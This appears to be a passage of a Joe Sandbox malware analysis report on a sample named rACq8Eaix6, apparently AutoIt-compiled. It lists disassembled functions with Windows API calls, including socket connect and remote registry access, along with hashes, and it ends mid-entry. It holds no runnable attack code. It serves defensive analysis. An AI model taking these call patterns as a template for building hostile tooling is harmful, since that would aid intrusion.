Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ae8bb45a2a7717bc4bd006bff545a51dd85d2c9e9e3992a699ec61d02bace79c
Instruction ID: aeca2b16d65b4442b577ddd1529d269c45a5a888071125311ec63d3fbb32ee80
Opcode Fuzzy Hash: ae8bb45a2a7717bc4bd006bff545a51dd85d2c9e9e3992a699ec61d02bace79c
Instruction Fuzzy Hash: 95310C75900209BFDB159B90DC89FFFB7BCEB48311F14016AE912A2181DA749FC99AA4

Function 00C562CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C562EC
GetWindowLongW.USER32(017E5450,000000F0), ref: 00C5631F
GetWindowLongW.USER32(017E5450,000000F0), ref: 00C56354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C56386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C563B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00C563C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C563DB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4590d9afb26f97858597a62433f9a6a4a65787976557232b7d5a80c708dbd817
Instruction ID: 5fbf4f05c2192c476e994c1b0065ebf775ead55cff9262d08e9a7740eb3f2429
Opcode Fuzzy Hash: 4590d9afb26f97858597a62433f9a6a4a65787976557232b7d5a80c708dbd817
Instruction Fuzzy Hash: 703135386402409FDB21CF18DC88F5937E1FB4A716F5801A8F9119F2B2CB71AD84DB58

Function 00C2DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2DB54
SysAllocString.OLEAUT32(00000000), ref: 00C2DB57
SysAllocString.OLEAUT32(?), ref: 00C2DB75
SysFreeString.OLEAUT32(?), ref: 00C2DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00C2DBA3
SysAllocString.OLEAUT32(?), ref: 00C2DBB1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 62a747b0a69f19002c8ebc166f5940d8bfad7408a8f355700c6e1dae58b664db
Instruction ID: 9328bfe80880ee46abae64fefff9d1f9ba1e23266ff55e2170eb1b3b504b7dc2
Opcode Fuzzy Hash: 62a747b0a69f19002c8ebc166f5940d8bfad7408a8f355700c6e1dae58b664db
Instruction Fuzzy Hash: 0921A336600319AFDF10DFA9DC84DBF73ACEB09360B018169FD15DB261D6709D868B60

Function 00C46173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C47D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C47DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C461C6
WSAGetLastError.WSOCK32(00000000), ref: 00C461D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C4620E
connect.WSOCK32(00000000,?,00000010), ref: 00C46217
WSAGetLastError.WSOCK32 ref: 00C46221
closesocket.WSOCK32(00000000), ref: 00C4624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C46263

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 0f6514813011a8223a6d2f5c4dac2eb2a0450a92c247f3ab4206b968cfa53d88
Instruction ID: 1f44058157ec4df9b1e04866776c216152c4042414015e3448501f8ce29e73d8
Opcode Fuzzy Hash: 0f6514813011a8223a6d2f5c4dac2eb2a0450a92c247f3ab4206b968cfa53d88
Instruction Fuzzy Hash: DD31AF35600218AFDF10AF24CC85BBE7BACFF46761F044069FD15A7291DB70AD459BA2

Function 00C2F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C2F671
__wcsnicmp.LIBCMT ref: 00C2F692
__wcsnicmp.LIBCMT ref: 00C2F6AC

Strings

#OnAutoItStartRegister, xrefs: 00C2F6A6
#requireadmin, xrefs: 00C2F68C
#notrayicon, xrefs: 00C2F669

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 4e1acbcea8be324da087fe14483199a25332ef40f4304835749717441fa2a376
Instruction ID: 9cad447f55b789cdaa89513063667f799ead788bb940848b503e39f7eddaf857
Opcode Fuzzy Hash: 4e1acbcea8be324da087fe14483199a25332ef40f4304835749717441fa2a376
Instruction Fuzzy Hash: E121227220463966D230AA35BC02EB7B3F8EF59B40B14403EF95687991EB519E4BC395

Function 00C2DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C2DC2F
SysAllocString.OLEAUT32(00000000), ref: 00C2DC32
SysAllocString.OLEAUT32 ref: 00C2DC53
SysFreeString.OLEAUT32 ref: 00C2DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00C2DC76
SysAllocString.OLEAUT32(?), ref: 00C2DC84

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2cd5e51a40e51a3288678338512ea8f8d7bcf00f39c45f6dec8dfee915913111
Instruction ID: b479889e5daa31ebed2b55d453b9fbeaa56882fa74ddd15d99e5d8a48c79b4e8
Opcode Fuzzy Hash: 2cd5e51a40e51a3288678338512ea8f8d7bcf00f39c45f6dec8dfee915913111
Instruction Fuzzy Hash: 0E21D835605214AF9B14DFA8DC88EAB77ECEB18320B008125F915CB261D770DC81CB64

Function 00C575CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BD1D73
Part of subcall function 00BD1D35: GetStockObject.GDI32(00000011), ref: 00BD1D87
Part of subcall function 00BD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BD1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C57632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C5763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C5764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C57659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C57665

Strings

Msctls_Progress32, xrefs: 00C57603

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 15b4bb64306521b3aa6cfd595ab87a3b388fb98535d124fa531d6f1a1aa3b768
Instruction ID: 99b97d9caaa9540c2db23d31a45c73292d6d92b8940403e4d2d5a7ad49875cdf
Opcode Fuzzy Hash: 15b4bb64306521b3aa6cfd595ab87a3b388fb98535d124fa531d6f1a1aa3b768
Instruction Fuzzy Hash: FA11C8B511021DBFEF159F64CC85EEB7F6DEF08798F014115BA04A2050CB729C61DBA4

Function 00BF9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00BF9AE6

Part of subcall function 00BF3187: EncodePointer.KERNEL32(00000000), ref: 00BF318A
Part of subcall function 00BF3187: __initp_misc_winsig.LIBCMT ref: 00BF31A5
Part of subcall function 00BF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BF9EA0
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BF9EB4
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BF9EC7
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BF9EDA
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BF9EED
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BF9F00
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BF9F13
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BF9F26
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BF9F39
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BF9F4C
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BF9F5F
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BF9F72
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BF9F85
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BF9F98
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BF9FAB
Part of subcall function 00BF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BF9FBE

__mtinitlocks.LIBCMT ref: 00BF9AEB
__mtterm.LIBCMT ref: 00BF9AF4

Part of subcall function 00BF9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BF9AF9,00BF7CD0,00C8A0B8,00000014), ref: 00BF9C56
Part of subcall function 00BF9B5C: _free.LIBCMT ref: 00BF9C5D
Part of subcall function 00BF9B5C: DeleteCriticalSection.KERNEL32(00C8EC00,?,?,00BF9AF9,00BF7CD0,00C8A0B8,00000014), ref: 00BF9C7F

__calloc_crt.LIBCMT ref: 00BF9B19
__initptd.LIBCMT ref: 00BF9B3B
GetCurrentThreadId.KERNEL32 ref: 00BF9B42

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 73d9ac74fb926b2c5958dab36e0f27910a51c28e0eb4f013b47b8a6cb2663c7d
Instruction ID: c9a4441bac41ecb86b483a52d4ceae2df659dfb631ae1906c05b02d31e0c8477
Opcode Fuzzy Hash: 73d9ac74fb926b2c5958dab36e0f27910a51c28e0eb4f013b47b8a6cb2663c7d
Instruction Fuzzy Hash: 55F090365197195AE7347778BC07BBE26D0DF02774F200AE9F764D70D6EF60884942A4

Function 00BF406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BF3F85), ref: 00BF4085
GetProcAddress.KERNEL32(00000000), ref: 00BF408C
EncodePointer.KERNEL32(00000000), ref: 00BF4097
DecodePointer.KERNEL32(00BF3F85), ref: 00BF40B2

Strings

combase.dll, xrefs: 00BF4080
RoUninitialize, xrefs: 00BF4074

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: cfbd9188cf23442693d66a2562666c29a78237d753ffc4c3ba478f316d86940f
Instruction ID: 68501fb08407677904fe2c7be878d667befcda7433f7972fb68920641defa1ba
Opcode Fuzzy Hash: cfbd9188cf23442693d66a2562666c29a78237d753ffc4c3ba478f316d86940f
Instruction Fuzzy Hash: D7E09274581740ABEA34AF71EC0DB1E3AA5B704783F10402AF205E20F0CFB64645CA14

Function 00C364B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C3660B
_memmove.LIBCMT ref: 00C36546

Part of subcall function 00BD9837: __itow.LIBCMT ref: 00BD9862
Part of subcall function 00BD9837: __swprintf.LIBCMT ref: 00BD98AC

_memmove.LIBCMT ref: 00C365B9
_memmove.LIBCMT ref: 00C366A0
_memmove.LIBCMT ref: 00C366B9
_memmove.LIBCMT ref: 00C366D5

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: a5949a5a8617db4c5741801bd851b8f9126fbbcc744c2f3eb8fa314980665f8a
Instruction ID: 63f3851e03532d555613cea24451ae2f27d8ae36b6d317b2b5e6343627071978
Opcode Fuzzy Hash: a5949a5a8617db4c5741801bd851b8f9126fbbcc744c2f3eb8fa314980665f8a
Instruction Fuzzy Hash: 8661BB3191065AABCF01FF60CC82EFE77A5AF05348F0485AAFD155B2A2EB35E905DB50

Function 00C501E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Part of subcall function 00C50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4FDAD,?,?), ref: 00C50E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C502BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C502FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C50320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C50349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C5038C
RegCloseKey.ADVAPI32(00000000), ref: 00C50399

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 7385e38e309eefcc06fc23ae8e0df04deb76e494370f2d151c38e3473df3dbb4
Instruction ID: 8c04917794844a39c870ff8876a5bcbbbd9c59b798dde4c21d7b3c6655799726
Opcode Fuzzy Hash: 7385e38e309eefcc06fc23ae8e0df04deb76e494370f2d151c38e3473df3dbb4
Instruction Fuzzy Hash: 9A516935208304AFC714EF64C885E6EBBE8FF85314F14496DF995872A2EB31E949CB52

Function 00C55799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C557FB
GetMenuItemCount.USER32(00000000), ref: 00C55832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C5585A
GetMenuItemID.USER32(?,?), ref: 00C558C9
GetSubMenu.USER32(?,?), ref: 00C558D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C55928

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: cf14a404792c069c96401a328e84b1b11381f4fb14b772f304689bfadd6db245
Instruction ID: 28d890b43f6d76ea3f7a12125d442bc61b8a289678d832a7c63908f303193f8e
Opcode Fuzzy Hash: cf14a404792c069c96401a328e84b1b11381f4fb14b772f304689bfadd6db245
Instruction Fuzzy Hash: 47517B39E00615EFCF05EF64C855AAEB7B4EF48321F1040A9EC11BB391DB35AE859B94

Function 00C2EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C2EF06
VariantClear.OLEAUT32(00000013), ref: 00C2EF78
VariantClear.OLEAUT32(00000000), ref: 00C2EFD3
_memmove.LIBCMT ref: 00C2EFFD
VariantClear.OLEAUT32(?), ref: 00C2F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C2F078

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 95b7767f302471a49c65f4313d8c53b3d2c6b486df47598585c7075418e0947e
Instruction ID: 018a8f07a76ff2e858ca7f76796869b4ddae04411fd4aa8bf78c6730d44fff2f
Opcode Fuzzy Hash: 95b7767f302471a49c65f4313d8c53b3d2c6b486df47598585c7075418e0947e
Instruction Fuzzy Hash: D3517AB5A00219EFCB14DF58D884AAAB7B8FF4C310B15856DE959DB301E730E952CFA0

Function 00C3220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C32258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C322A3
IsMenu.USER32(00000000), ref: 00C322C3
CreatePopupMenu.USER32 ref: 00C322F7
GetMenuItemCount.USER32(000000FF), ref: 00C32355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C32386

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 0e5465073f04f5c4451a6520bb78c363df35a171eda8db26e65784d499538261
Instruction ID: ec10eabdc1531d4deb3aa60ee227cb3b9b0ec5e4834005990cbaace0c957421e
Opcode Fuzzy Hash: 0e5465073f04f5c4451a6520bb78c363df35a171eda8db26e65784d499538261
Instruction Fuzzy Hash: FE51F270611309EFDF65CF68C888BAEBBF9FF05314F104129E861AB2A0E3759A44CB51

Function 00BD1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BD2612: GetWindowLongW.USER32(?,000000EB), ref: 00BD2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00BD179A
GetWindowRect.USER32(?,?), ref: 00BD17FE
ScreenToClient.USER32(?,?), ref: 00BD181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BD182C
EndPaint.USER32(?,?), ref: 00BD1876

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 14de5ecedc2f432afd4163baab6f545a73c60a0e977edfc9b1d472acb77e20e7
Instruction ID: 337b129eb446080fb3a6c6ec3e63373f0205573bc7edbaaf3b0bcca237bc5284
Opcode Fuzzy Hash: 14de5ecedc2f432afd4163baab6f545a73c60a0e977edfc9b1d472acb77e20e7
Instruction Fuzzy Hash: 7841AE70504700AFDB11DF29CC88BAABBE8EB45724F044AAAF9A4872F1D7319D45DB61

Function 00C5B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00C957B0,00000000,017E5450,?,?,00C957B0,?,00C5B5A8,?,?), ref: 00C5B712
EnableWindow.USER32(00000000,00000000), ref: 00C5B736
